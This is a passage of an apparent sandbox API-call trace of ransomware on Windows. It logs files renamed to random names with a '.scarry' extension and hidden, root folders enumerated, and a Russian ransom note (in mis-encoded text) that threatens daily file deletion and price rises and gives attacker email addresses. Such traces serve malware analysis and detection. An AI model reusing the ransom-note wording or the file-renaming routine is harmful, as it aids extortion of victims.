returned 0x450004 [0103.560] GlobalUnlock (hMem=0x450004) returned 0 [0103.560] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0103.561] GlobalLock (hMem=0x450004) returned 0x58c010 [0103.561] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.561] GlobalUnlock (hMem=0x45000c) returned 0 [0103.561] GlobalHandle (pMem=0x58c010) returned 0x450004 [0103.561] GlobalUnlock (hMem=0x450004) returned 0 [0103.562] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.562] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.562] GlobalUnlock (hMem=0x450004) returned 0 [0103.562] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0103.562] GlobalLock (hMem=0x450004) returned 0x588000 [0103.562] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.562] GlobalUnlock (hMem=0x450004) returned 0 [0103.645] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7c018, cbMultiByte=39, lpWideCharStr=0x18e740, cchWideChar=2047 | out: lpWideCharStr="wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry") returned 39 [0103.646] MoveFileW (lpExistingFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry" (normalized: "c:\\wqt5ybokhxghqaydyclssrh4mrekabf0.scarry")) returned 1 [0103.646] CreateFileW (lpFileName="C:\\wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry" (normalized: "c:\\wqt5ybokhxghqaydyclssrh4mrekabf0.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.646] SetFileTime (hFile=0x190, lpCreationTime=0x18f7d0, lpLastAccessTime=0x18f7c8, lpLastWriteTime=0x18f7c0) returned 1 [0103.646] CloseHandle (hObject=0x190) returned 1 [0103.647] SetFileAttributesW (lpFileName="C:\\wQT5YbokHxgHQayDYCLssrH4mrekabF0.scarry", dwFileAttributes=0x27) returned 1 [0103.647] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, 
cbMultiByte=36, lpWideCharStr=0x18ea68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXTרּ\x18\x03") returned 36 [0103.647] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.647] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.647] GlobalUnlock (hMem=0x450004) returned 0 [0103.647] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.647] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.647] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.647] GlobalUnlock (hMem=0x450004) returned 0 [0103.648] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.648] GlobalUnlock (hMem=0x45000c) returned 0 [0103.648] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. 
\r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.648] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.648] FindFirstFileW (in: lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfce43100, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfce43100, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfce69260, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe4001ffb, dwReserved1=0x78e, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x577e58 [0103.648] FileTimeToLocalFileTime (in: lpFileTime=0x18f830, lpLocalFileTime=0x18f7b0 | out: lpLocalFileTime=0x18f7b0) returned 1 
[0103.648] FileTimeToDosDateTime (in: lpFileTime=0x18f7b0, lpFatDate=0x18f7fe, lpFatTime=0x18f7fc | out: lpFatDate=0x18f7fe, lpFatTime=0x18f7fc) returned 1 [0103.648] FindClose (in: hFindFile=0x577e58 | out: hFindFile=0x577e58) returned 1 [0103.648] CreateFileW (lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.648] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.648] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0xdf9 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0xdf9 [0103.649] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18fa04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18fa04*=0) returned 0x0 [0103.649] ReadFile (in: hFile=0x190, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18fa28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18fa28*=0xdf9, lpOverlapped=0x0) returned 1 [0103.649] CloseHandle (hObject=0x190) returned 1 [0103.649] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, 
ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0103.649] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0103.649] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0103.649] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.649] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.649] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.649] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.650] GlobalUnlock (hMem=0x45000c) returned 0 [0103.650] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.650] GlobalLock (hMem=0x450004) returned 0x588000 [0103.650] GlobalHandle 
(pMem=0x56f100) returned 0x45000c [0103.650] GlobalUnlock (hMem=0x45000c) returned 0 [0103.650] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.650] GlobalUnlock (hMem=0x450004) returned 0 [0103.650] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.650] CharLowerBuffW (in: lpsz="hiberfil.sys", cchLength=0xc | out: lpsz="hiberfil.sys") returned 0xc [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.650] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXTרּ\x18\x03") returned 36 [0103.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\hiberfil.sys", cchWideChar=15, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\hiberfil.sys", lpUsedDefaultChar=0x0) returned 15 [0103.651] CharLowerBuffW (in: lpsz=".sys", cchLength=0x4 | 
out: lpsz=".sys") returned 0x4 [0103.651] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".sys", cchWideChar=4, lpMultiByteStr=0x18ea64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".sysñ", lpUsedDefaultChar=0x0) returned 4 [0103.651] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0103.651] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0103.651] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.651] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.651] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.651] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.651] GlobalUnlock (hMem=0x450004) returned 0 [0103.651] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.651] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.651] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.651] GlobalUnlock (hMem=0x450004) returned 0 
[0103.651] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.651] GlobalUnlock (hMem=0x45000c) returned 0 [0103.651] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.653] CharLowerBuffW (in: lpsz="pagefile.sys", cchLength=0xc | out: lpsz="pagefile.sys") returned 0xc [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXTרּ\x18\x03") returned 36 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\pagefile.sys", cchWideChar=15, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\pagefile.sys", lpUsedDefaultChar=0x0) returned 15 [0103.654] CharLowerBuffW (in: lpsz=".sys", cchLength=0x4 | out: lpsz=".sys") returned 0x4 [0103.654] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr=".sys", cchWideChar=4, lpMultiByteStr=0x18ea64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".sysñ", lpUsedDefaultChar=0x0) returned 4 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, 
ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: 
